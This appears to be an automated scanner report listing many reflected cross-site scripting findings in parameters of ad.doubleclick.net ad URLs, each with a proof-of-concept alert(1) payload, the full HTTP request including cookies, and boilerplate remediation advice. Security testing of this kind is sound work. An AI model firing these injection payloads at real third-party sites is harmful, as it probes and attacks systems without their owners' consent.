GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39ec72f"-alert(1)-"ab1b11816da&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39ec72f"-alert(1)-"ab1b11816da&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608435"); var wmode = "opaque"; var bg = "same as SWF"; va ...[SNIP]...
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70029"-alert(1)-"d5e6cc613b5 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=1470029"-alert(1)-"d5e6cc613b5&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the b request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd133'-alert(1)-'f173d93a6 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14fd133'-alert(1)-'f173d93a6&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f68b2'-alert(1)-'701c5fe0be3 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0f68b2'-alert(1)-'701c5fe0be3&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5169f"-alert(1)-"c993156fbb2 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=05169f"-alert(1)-"c993156fbb2&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the count request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f707'-alert(1)-'33559d16e43 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=3f707'-alert(1)-'33559d16e43&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9850e"-alert(1)-"d2b4ef7b6c9 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=9850e"-alert(1)-"d2b4ef7b6c9&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd040"-alert(1)-"8854e35d8ef was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=dd040"-alert(1)-"8854e35d8ef&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6662c'-alert(1)-'85eaa813731 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=6662c'-alert(1)-'85eaa813731&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the e request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcb63'-alert(1)-'dbfa3066ef4 was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=bcb63'-alert(1)-'dbfa3066ef4&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8e49"-alert(1)-"5c56edf5f04 was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=f8e49"-alert(1)-"5c56edf5f04&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
var spongecellParams = { clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/z%3B240046691%3B5-0%3B0%3B61212128%3B4307-300/250%3B41645541/41663328/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=f8e49"-alert(1)-"5c56edf5f04&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/", siteId: "794364", place ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12934"-alert(1)-"dee4c1d2568 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=12934"-alert(1)-"dee4c1d2568&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf3d9'-alert(1)-'b66310e94c was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=bf3d9'-alert(1)-'b66310e94c&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47fe8"-alert(1)-"84989796090 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=47fe8"-alert(1)-"84989796090 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the event request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb9db'-alert(1)-'ff3e3bf1da7 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=fb9db'-alert(1)-'ff3e3bf1da7 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba10d"-alert(1)-"8bda0c8c53d was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cnba10d"-alert(1)-"8bda0c8c53d&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0342'-alert(1)-'11a72795243 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cnb0342'-alert(1)-'11a72795243&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bde3f"-alert(1)-"c3f8f3fe10d was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
